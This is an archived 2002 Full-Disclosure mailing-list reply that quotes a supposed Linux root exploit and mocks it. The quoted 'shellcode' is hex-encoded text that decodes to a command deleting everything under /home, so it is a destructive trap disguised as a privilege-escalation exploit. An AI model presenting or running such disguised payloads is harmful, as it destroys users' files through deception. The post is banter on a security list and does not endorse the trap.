[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!

From: Nexus (nexus@patrol.i-way.co.uk)
Date: 11/29/02

• Next message: Brain Storm: "[Full-Disclosure] ELECTRONICSOULS POSTS ARE FAKE !!"
• Previous message: es@hush.com: "[Full-Disclosure] [ElectronicSouls] subnet scanner faster than nmap"
• In reply to: Day Jay: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Next in thread: qobaiashi: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Reply: qobaiashi: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: nexus@patrol.i-way.co.uk (Nexus)
Date: Fri, 29 Nov 2002 09:56:08 -0000

> Get r00t on any Linux x86 system
> With the below shellcode.
>
> It uses an exploit in the linux
> kernel to elevate privilages to root!
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";

What version of Linux ? I ran this on my windows 95 box and it said:
"'rm' is not recognized as an internal or external command, operable program
or batch file."
I ported the shellcode to a windows batch file and it still failed...
What am I doing wrong ?
/me confused ;-)

Also, my Linux box is Z80, not x86 - I can do a Z80 version if you want ?

Cheers.

---

• Next message: Brain Storm: "[Full-Disclosure] ELECTRONICSOULS POSTS ARE FAKE !!"
• Previous message: es@hush.com: "[Full-Disclosure] [ElectronicSouls] subnet scanner faster than nmap"
• In reply to: Day Jay: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Next in thread: qobaiashi: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Reply: qobaiashi: "[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: multi-OS infections (Multi OS shellcode) ... The following asm was used to create the shellcode that follows it. ... linux: movl $0x1111113b, %eax ... bsd: movl $0x11111130, %eax ... (Vuln-Dev) [Full-Disclosure] [ElectronicSouls] - Advanced Linux Shellcode ... We have pioneered a new shellcoding style for Linux. ... What our shellcode does is your typical "portbinding", but we take it to the next level as we have it bind to a random port. ... (Full-Disclosure) Re: OS X Shell Code ... Here is some shellcode that I wrote a while back. ... also (same syscall number for execve) and fine on Linux with a changed ... On Thu, 10 Jan 2002, Josha Bronson wrote: ... (Vuln-Dev) Re: buffer overflow question ... > I have a question regarding buffer overflow exploits. ... > Assuming we want to exploit a simple program on linux, ... > copying when it reaches the NULL byte inside the shellcode? ... (comp.os.linux.security) Re: How to pass the "pulse ENTER key to start" to a Windows XP program in console or shell ... You have to create an empty text file, and then, to push the enter key in ... >> in shell commands all the times I call the program with different ... >> I want to run the batch file totally unnattended. ... > Since you are posting this to a linux group I will assume that you are ... (comp.os.linux.misc)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > Full-Disclosure  > 2002-11